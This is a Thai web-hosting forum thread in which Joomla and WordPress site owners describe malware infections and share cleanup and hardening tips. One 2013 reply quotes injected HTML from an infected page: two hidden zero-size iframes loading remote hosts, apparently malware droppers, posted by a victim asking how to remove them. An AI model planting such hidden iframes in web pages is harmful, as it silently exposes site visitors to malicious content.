ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

ThaiSEOBoard.comพัฒนาเว็บไซต์CMS & Free Scriptใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
หน้า: [1] 2  ทั้งหมด   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย  (อ่าน 5479 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
illusionto
ก๊วนเสียว
*

พลังน้ำใจ: 28
ออฟไลน์ ออฟไลน์

กระทู้: 290



ดูรายละเอียด
« เมื่อ: 07 กรกฎาคม 2012, 02:40:33 »

 wanwan044 กำลังนั่งเซ็งอยู่เลยครับไม่คิดว่าจะโดนเองหลังจากที่เคยเห็นแต่เว็บคนอื่นเขาโดนกัน ส่วนใหญ่ ผมใช้ joomla เป็นหลัก มาวันนี้ joomla ป่วยติดไวรัส มัลแวร์เลย จากการประกาศเตือน ของอากู๋ก่อนหน้านี้ จากการแนะนำสำหรับเว็บที่ติดมัลแวร์ http://www.stopbadware.org/home/security เปิดเว็บตัวเองวันนี้โดนเลย ใครพอมีแนวทางการกำจัดไวรัส ทั้งในโฮส และเครื่องคอมพิวเตอร์ของเรา  wanwan017 ช่วยผมทีนะคร้าบ เผื่อใครที่โดนแบบผมจะได้แก้ไขได้ทัน  :'( ครั้งแรกของการทำเว็บ  ขอบคุณคร้าบ
บันทึกการเข้า

ShizzK
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 165
ออฟไลน์ ออฟไลน์

กระทู้: 2,512



ดูรายละเอียด
« ตอบ #1 เมื่อ: 07 กรกฎาคม 2012, 07:48:50 »

ของผมนะครับ โหลดไฟล์มาที่เครื่อง แล้วสแกนไวรัสดู ถ้าไม่มี

ให้เราสแกนเครื่องของเรา เปลี่ยนพาส ftp ไปหาไฟล์ที่ติดมัลแวร์ ส่วนใหญ่เวลาเข้าไปในไฟล์นั้นมันจะขึ้นว่าติดมัลแวร์

แสดงว่าไฟล์นั้นแหละตัวนำไวรัส ถ้าำไม่เจอไฟล์ไหนเลย

ก็ให้เราไปดูที่ htaccess ดูว่ามีการ refer หรือโยกย้ายหน้าโดเมนไปที่อื่นรึเปล่า หรือไปดูที่ google webmaster tools นะครับ

เขาจะบอกไ้ว้หมด
บันทึกการเข้า
illusionto
ก๊วนเสียว
*

พลังน้ำใจ: 28
ออฟไลน์ ออฟไลน์

กระทู้: 290



ดูรายละเอียด
« ตอบ #2 เมื่อ: 07 กรกฎาคม 2012, 15:38:33 »

ของผมนะครับ โหลดไฟล์มาที่เครื่อง แล้วสแกนไวรัสดู ถ้าไม่มี

ให้เราสแกนเครื่องของเรา เปลี่ยนพาส ftp ไปหาไฟล์ที่ติดมัลแวร์ ส่วนใหญ่เวลาเข้าไปในไฟล์นั้นมันจะขึ้นว่าติดมัลแวร์

แสดงว่าไฟล์นั้นแหละตัวนำไวรัส ถ้าำไม่เจอไฟล์ไหนเลย

ก็ให้เราไปดูที่ htaccess ดูว่ามีการ refer หรือโยกย้ายหน้าโดเมนไปที่อื่นรึเปล่า หรือไปดูที่ google webmaster tools นะครับ

เขาจะบอกไ้ว้หมด

ขอบคุณมากเลยครับ ครั้งแรกเลยที่โดน เวลาเข้าระบบ admin หรือ host ทีก็กลัวๆอยู่ว่าถ้าเข้าไปดำเนินการต่อ จะติดไวรัสมัลแวร์เพิ่มอีกไหม ทำให้ล่าช้าในการแก้ไวรัสครับ
บันทึกการเข้า

Bes
Verified Seller
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 145
ออฟไลน์ ออฟไลน์

กระทู้: 3,502



ดูรายละเอียด เว็บไซต์
« ตอบ #3 เมื่อ: 07 กรกฎาคม 2012, 23:30:32 »

ระวังเรื่องการ Chmod 777 ให้เฉพาะที่ Joomla ต้องการก็พอ มากกว่านั้นจะมีปัญหาได้
บันทึกการเข้า

smapan
Global Moderator
เจ้าพ่อบอร์ดเสียว
*****

พลังน้ำใจ: 643
ออฟไลน์ ออฟไลน์

กระทู้: 8,272



ดูรายละเอียด เว็บไซต์
« ตอบ #4 เมื่อ: 13 กรกฎาคม 2012, 10:49:09 »

เบื้องต้นสุดๆของการรักษาความปลอดภัย คืออัพเดต version ให้ล่าสุดเสมอ ครับ
บันทึกการเข้า

จูมล่าโฮส สยามโฮสเว็บ modty.com
รวมที่พัก เช่ารายวัน ที่พักเช่ารายเดือนมากที่สุดแจ่มจริง
***Tel 083-757-1515 ติดปัญหา Joomla ตรงไหนรับปรึกษาฟรี โทรมาเถอะครับ ถ้าตอบได้ช่วยแน่นอน ไม่มีกั้ก. ***
Freedomlover
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 207
ออฟไลน์ ออฟไลน์

กระทู้: 2,097



ดูรายละเอียด เว็บไซต์
« ตอบ #5 เมื่อ: 13 กรกฎาคม 2012, 10:54:27 »

เบื้องต้นสุดๆของการรักษาความปลอดภัย คืออัพเดต version ให้ล่าสุดเสมอ ครับ

แนะนำตามนี้ครับ
บันทึกการเข้า

โฮสติ้ง คุณภาพสูง ราคาเริ่มต้น 50 บาท/เดือน ทดลองใช้ฟรี 30 วัน
SSD VPS แรงๆ
จดโดเมนเพียง 400 บาท/ปี
ด้วยประสบการณ์กว่า 12 ปี  Tel 0840640213
CMSHostThailand
บุคคลทั่วไป
« ตอบ #6 เมื่อ: 13 กรกฎาคม 2012, 12:09:19 »

Male Ware InJection

วิธีแก้ไข redirect to minkof.sellclassics.com
http://www.cmshostthailand.com...tion=displayarticle&id=518

Case By Customer
บันทึกการเข้า
binknon7
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 549
ออฟไลน์ ออฟไลน์

กระทู้: 2,039



ดูรายละเอียด
« ตอบ #7 เมื่อ: 13 กรกฎาคม 2012, 13:16:38 »

ผมยังไม่โดนนะ  wanwan017
บันทึกการเข้า
iamscreener
ก๊วนเสียว
*

พลังน้ำใจ: 5
ออฟไลน์ ออฟไลน์

กระทู้: 204



ดูรายละเอียด เว็บไซต์
« ตอบ #8 เมื่อ: 13 กรกฎาคม 2012, 13:19:25 »

wanwan044 กำลังนั่งเซ็งอยู่เลยครับไม่คิดว่าจะโดนเองหลังจากที่เคยเห็นแต่เว็บคนอื่นเขาโดนกัน ส่วนใหญ่ ผมใช้ joomla เป็นหลัก มาวันนี้ joomla ป่วยติดไวรัส มัลแวร์เลย จากการประกาศเตือน ของอากู๋ก่อนหน้านี้ จากการแนะนำสำหรับเว็บที่ติดมัลแวร์ http://www.stopbadware.org/home/security เปิดเว็บตัวเองวันนี้โดนเลย ใครพอมีแนวทางการกำจัดไวรัส ทั้งในโฮส และเครื่องคอมพิวเตอร์ของเรา  wanwan017 ช่วยผมทีนะคร้าบ เผื่อใครที่โดนแบบผมจะได้แก้ไขได้ทัน  :'( ครั้งแรกของการทำเว็บ  ขอบคุณคร้าบ

ผมก็เพิ่งโดนไปครับ เป็นกำลังใจให้ครับ
บันทึกการเข้า

denzicrew
คนรักเสียว
*

พลังน้ำใจ: 2
ออฟไลน์ ออฟไลน์

กระทู้: 106



ดูรายละเอียด
« ตอบ #9 เมื่อ: 17 กรกฎาคม 2012, 10:31:04 »

หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ
บันทึกการเข้า
smapan
Global Moderator
เจ้าพ่อบอร์ดเสียว
*****

พลังน้ำใจ: 643
ออฟไลน์ ออฟไลน์

กระทู้: 8,272



ดูรายละเอียด เว็บไซต์
« ตอบ #10 เมื่อ: 17 กรกฎาคม 2012, 10:38:02 »

หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ

อัพเดต ตรงไหนครับที่พัง และ พังยังไงครับ
บันทึกการเข้า

จูมล่าโฮส สยามโฮสเว็บ modty.com
รวมที่พัก เช่ารายวัน ที่พักเช่ารายเดือนมากที่สุดแจ่มจริง
***Tel 083-757-1515 ติดปัญหา Joomla ตรงไหนรับปรึกษาฟรี โทรมาเถอะครับ ถ้าตอบได้ช่วยแน่นอน ไม่มีกั้ก. ***
dramaseo
ก๊วนเสียว
*

พลังน้ำใจ: 33
ออฟไลน์ ออฟไลน์

กระทู้: 229



ดูรายละเอียด เว็บไซต์
« ตอบ #11 เมื่อ: 17 กรกฎาคม 2012, 10:40:17 »

หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ

ก่อนอัพเดทผมจะแบคอัพไว้ก่อนเสมอ แล้วอัพเดทแบบเมนวลคือโยนไฟล์อัพเดทเข้าไปแทนทีเดิมใน FTP ซึ่งจริงๆหลังเว็บมีให้อัพเดทแบบออโต้นะ แต่ช้าๆอึดอัพเลยใช้แบบเมนวลแทน และไม่เคยพบว่าเว็บพังเลยนะ ต้องดูเวอร์ชั่นอัพเดทให้ตรงด้วย เช่นอัพจาก 2.5.4 ไป 2.5.6 ก็ต้องหาไฟล์เฉพาะของมัน
บันทึกการเข้า

jupiterjan
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 110
ออฟไลน์ ออฟไลน์

กระทู้: 1,286



ดูรายละเอียด
« ตอบ #12 เมื่อ: 17 กรกฎาคม 2012, 10:45:21 »

ใช้ template nulled หรือปล่าวครับ กำลัง จะใช้ joomla
บันทึกการเข้า

บริการ Text link web Pr5 (DA=47 PA=55 mR=5.13) ติด dmoz อายุ 20ปี(1996-2016) แถม Pr4 1เว็บ pr2 2เว็บ  pr1 1เว็บ ราคา 700 ต่อ เดือน สนใจPM ครับ  แสดงผล ทุกหน้า
- ไม่รับเว็บที่ผิดกฎหมาย , 18+ , การพนัน , เว็บหมิ่นสถาบัน
ข่าวอสังหา ล่าสุด      ่ว่าง 3ที่
ขายโดเมน koratnow.com  2000 บาท godaddy
user thaiseomarket :: infinitewire
dramaseo
ก๊วนเสียว
*

พลังน้ำใจ: 33
ออฟไลน์ ออฟไลน์

กระทู้: 229



ดูรายละเอียด เว็บไซต์
« ตอบ #13 เมื่อ: 17 กรกฎาคม 2012, 10:50:16 »

อีกอย่างพวกเทมเพลตมาตรฐานที่แถมมาให้ ถ้าเราโมด้วยเทมเพลตเหล่านี้มันจะอัพเดทด้วย ต้องแบคอัพไฟล์เทมเพลตไว้ก่อน แล้วค่อยเอาไปทับหลังอัพเดท
บันทึกการเข้า

denzicrew
คนรักเสียว
*

พลังน้ำใจ: 2
ออฟไลน์ ออฟไลน์

กระทู้: 106



ดูรายละเอียด
« ตอบ #14 เมื่อ: 17 กรกฎาคม 2012, 11:11:35 »

หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ

ก่อนอัพเดทผมจะแบคอัพไว้ก่อนเสมอ แล้วอัพเดทแบบเมนวลคือโยนไฟล์อัพเดทเข้าไปแทนทีเดิมใน FTP ซึ่งจริงๆหลังเว็บมีให้อัพเดทแบบออโต้นะ แต่ช้าๆอึดอัพเลยใช้แบบเมนวลแทน และไม่เคยพบว่าเว็บพังเลยนะ ต้องดูเวอร์ชั่นอัพเดทให้ตรงด้วย เช่นอัพจาก 2.5.4 ไป 2.5.6 ก็ต้องหาไฟล์เฉพาะของมัน

อัพจาก 1.5 ไป 2.5 ค่ะ เลยพัง (จริงๆมันก็สมควรใช่มั้ยล่ะ )
บันทึกการเข้า
siamlivehost
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 156
ออฟไลน์ ออฟไลน์

กระทู้: 1,709



ดูรายละเอียด เว็บไซต์
« ตอบ #15 เมื่อ: 17 กรกฎาคม 2012, 11:23:48 »

ของลูกค้าผม ส่วนมากจะพรุนจาก template เถื่อนที่โหลดมาใช้กัน
บันทึกการเข้า


เร็ว แรง บริการดี เหตุผลที่ใคร ๆ ก็เลือกใช้ ZimpleCloud
Cloud SSD Web Hosting โฮสติ้ง Cloud SSD ไม่จำกัด Domain Linux VPS เร็ว แรง Free DirectAdmin รีสอร์ทอัมพวา
eyourhand
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 145
ออฟไลน์ ออฟไลน์

กระทู้: 2,435



ดูรายละเอียด เว็บไซต์
« ตอบ #16 เมื่อ: 17 กรกฎาคม 2012, 11:38:03 »

เว็บผมก็โดนครับ เป็น WP

เบื้องต้นให้รีบทันทีคือ
- เปลี่ยน Pwd: FTP , Backend ต่างๆ ก่อน
- ปรับ CMOD : เป็นระดับ 644 , 444 (index.php)
- สแกนไวรัส ที่เครื่องตัวเองครับ
- ใช้ FileZilla ในการอัฟโหลด และล้าง pwd การ login เข้า ทุกครั้ง

ส่วนต่อมา
- Google webmaster tool ก็สมัครเพื่อให้เห็นปัญหาครับ
ยังไงปรึกษา ทาง PM ได้ครับ  wanwan017
บันทึกการเข้า

fungi456
Newbie
*

พลังน้ำใจ: 4
ออฟไลน์ ออฟไลน์

กระทู้: 75



ดูรายละเอียด เว็บไซต์
« ตอบ #17 เมื่อ: 17 กรกฎาคม 2012, 11:38:10 »

4 เว็บ โดนทั้ง Joomla และ SMF ตอนนี้แก้ไขเรียบร้อยหมดแล้ว แต่ก็ยังแอบหวั่นใจอยู่ ช่วงนี้ต้องระวังมากๆ ชุมกว่าหวัดนกอีก
บันทึกการเข้า

จำหน่ายเครื่องซัก อบ รีด อุตสาหกรรม http://www.xn--12cahmu5d5b2blga5fnve5dtd8f2a0n9g3a.com
จะขายอะไรดี.com  http://xn--22cl1b3cf3dsdp9a4m.com/
http://chevysonic-club.com
http://www.tripandhotel.com
greennud
Newbie
*

พลังน้ำใจ: 0
ออฟไลน์ ออฟไลน์

กระทู้: 2



ดูรายละเอียด
« ตอบ #18 เมื่อ: 02 พฤศจิกายน 2013, 11:02:34 »

รบกวนสอบถามครับ ว่า

เมื่อเราเข้าไปที่หน้า url http://www.abc.com/index.php/visa
 
เมื่อเราดูจาก code จาก page source แล้วพบว่าพบ code ที่โดนแทรก code อย่างนี้

=====================================

<iframe onload="iFrameHeight()"   id="blockrandom"
   name=""
   src="http://88.198.219.85 "
   width="1"
   height="1"
   scrolling="auto"
   align="top"
   frameborder="0"
   class="wrapper">
   No Iframes</iframe>
 ?>
</body><iframe src="http://www.emkbiyomedikal.com.tr/tmp/ini.php "  width="0" height="0" frameborder="0"></iframe>

=====================================

หากผมต้องการเข้าไปลบออก ต้องไปลบที่ไฟล์ไหนครับ
ขอบคุณมากครับ

บันทึกการเข้า
phpwin
ก๊วนเสียว
*

พลังน้ำใจ: 100
ออฟไลน์ ออฟไลน์

กระทู้: 295



ดูรายละเอียด เว็บไซต์
« ตอบ #19 เมื่อ: 02 พฤศจิกายน 2013, 11:26:37 »

ระวังเรื่องการ Chmod 777 ให้เฉพาะที่ Joomla ต้องการก็พอ มากกว่านั้นจะมีปัญหาได้

ตามความคิดเห็นนี้ครับ 777 เฉพาะการอัพโหลดรูปหรือไฟล์ก็พอครับ แล้วเขียน .htaccess ดักในโฟลเดอร์นั้นอีกทีว่า ให้อัพโหลดไฟล์นามสกุลอะไรได้บ้าง
แนะนำให้อัพเกรดเป็นเวอร์ชั่นล่าสุดครับ ตอนนี้ผมใช้ Joomla 2.5.14 อยู่ครับ
โค๊ด:
http://www.joomlacorner.com/joomla-news/829-joomla-2-5-14-released.html
บันทึกการเข้า

สอน PHP ร้านค้าออนไลน์   รับทำเว็บไซต์ ร้านค้าออนไลน์ ราคาถูก #รับแก้ไขเว็บไซต์ #รับปรับแต่ง Open Cart #รับปรับแต่งเว็บไซต์ให้ไวติดจรวด #ขายเว็บไซต์เช็คราคาสินค้าแบบเทพๆ lnwprice.com
หน้า: [1] 2  ทั้งหมด   ขึ้นบน
พิมพ์